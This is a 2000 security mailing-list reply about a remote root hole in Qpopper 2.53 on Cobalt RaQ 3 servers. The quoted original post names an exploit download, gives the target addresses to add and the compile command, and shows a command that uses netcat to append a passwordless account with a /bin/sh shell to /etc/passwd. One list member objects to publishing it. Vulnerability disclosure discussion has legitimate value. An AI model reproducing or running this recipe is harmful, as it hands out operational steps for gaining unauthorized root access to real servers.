
Re: [cobalt-security] Qpopper - remote root...



Well, it's a known problem, and has been known for a while.  I only
just got around to having a look at exploiting it on my RaQ
3.  Admittedly, this post should have waited till Monday morning
when everybody was back at work.

The post stems from my bugtraq post the other week - I got quite a lot of
mail from that saying both proftpd and qpopper were not exploitable
remotely with Cobalt OS 5.0, so I'm finally getting around to checking
properly.  Qpopper definitely is :\.

Gossi.


On Sat, 22 Jul 2000, Frank Cubillos wrote:

> Why the heck would you publish that on an open list!
> Geez Louise think about the lurkers in here!! Man, am I going ballistic for
> no reason?
> Group?
> Frank
> 
> > Hi,
> > If you want to exploit a Cobalt RaQ 3, grab the Qpopper 2.53 exploit from
> > http://www.hack.co.za/daem0n/pop/pop3/7350qpop.c, add the following line
> > to the "targets[]" structure:
> >   { "Cobalt OS 5.0: qpopper-2.53", 0xBFFFD368, 0xbfffdc18 },
> > compile the exploit (gcc 7350qpop.c -o qpop-cobalt), and run it in the
> > following fashion...:
> > ./qpop-cobalt <target-id-you-made> foobar@xxxxxxxxxxx user@xxxxxxxxxxxxx
> > echo owned::500:100:cracker:/:/bin/sh >>/etc/passwd 2>&1 >/dev/null | nc
> > sendmail-server.com 25
> > (user@xxxxxxxxxxxxx to, for example, gossi@xxxxxxxxxxxxxx, and
> > sendmail-server.com to a mail server you can send through).  You'll need
> > netcat installed on the box you are testing from.
> > That'll add a remote user (owned, no password) to the cobalt.
> > The attack doesn't require an account on the system - it simply needs you
> > to know an account on the system which 'pop3' is being used to retrieve
> > the mail of - I'd imagine this is a majority of accounts on Cobalts.
> 
> 
> 
> _______________________________________________
> cobalt-security mailing list
> cobalt-security@xxxxxxxxxxxxxxx
> http://list.cobalt.com/mailman/listinfo/cobalt-security
> 

-- 
gossi@xxxxxxxxxxxxxxx